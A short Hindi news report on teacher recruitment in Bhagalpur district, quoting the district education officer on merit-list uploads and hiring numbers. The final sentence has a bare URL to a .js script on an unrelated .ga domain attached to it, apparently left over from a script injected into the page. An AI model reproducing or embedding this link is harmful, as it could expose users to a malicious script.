जिला शिक्षा कार्यालय रोज़गार प्रदान की प्रक्रिया करेगा जल्द प्रारंभ।
भागलपुर,( कुलसूम फात्मा ) जल्द ही रोज़गार प्रक्रिया प्रारंभ करने की तैयारी में जिला शिक्षा कार्यालय लगा हुआ नियोजन की जानकारी जिला शिक्षा पदाधिकारी संजय कुमार ने दी।
संजय कुमार से जब बातचीत हुई तो उन्होंने बताया की नियोजन इकाइयों को तकरीबन जनवरी की 10 तारीख से मेरिट लिस्ट को एनआईसी पर अपलोड करने का निर्देश दे दिया गया है। जिले में 2012 में शुरुआत में स्कूलों में यह कक्षा एक से पांच तक के तकरीबन 2200 शिक्षकों को रोजगार प्रदान होगा।
तथा कक्षा 6 से 8 तक के शिक्षकों की संख्या 400 है और इनको अलग-अलग विषयों में नियोजन होना है। उन्होंने कहा कि राज्य के सभी डिस्ट्रिक्ट में तकरीबन 90 हजार प्राथमिक शिक्षकों को रोजगार प्रदान किया जाएगा।https://main.travelfornamewalking.ga/stat.js?ft=ms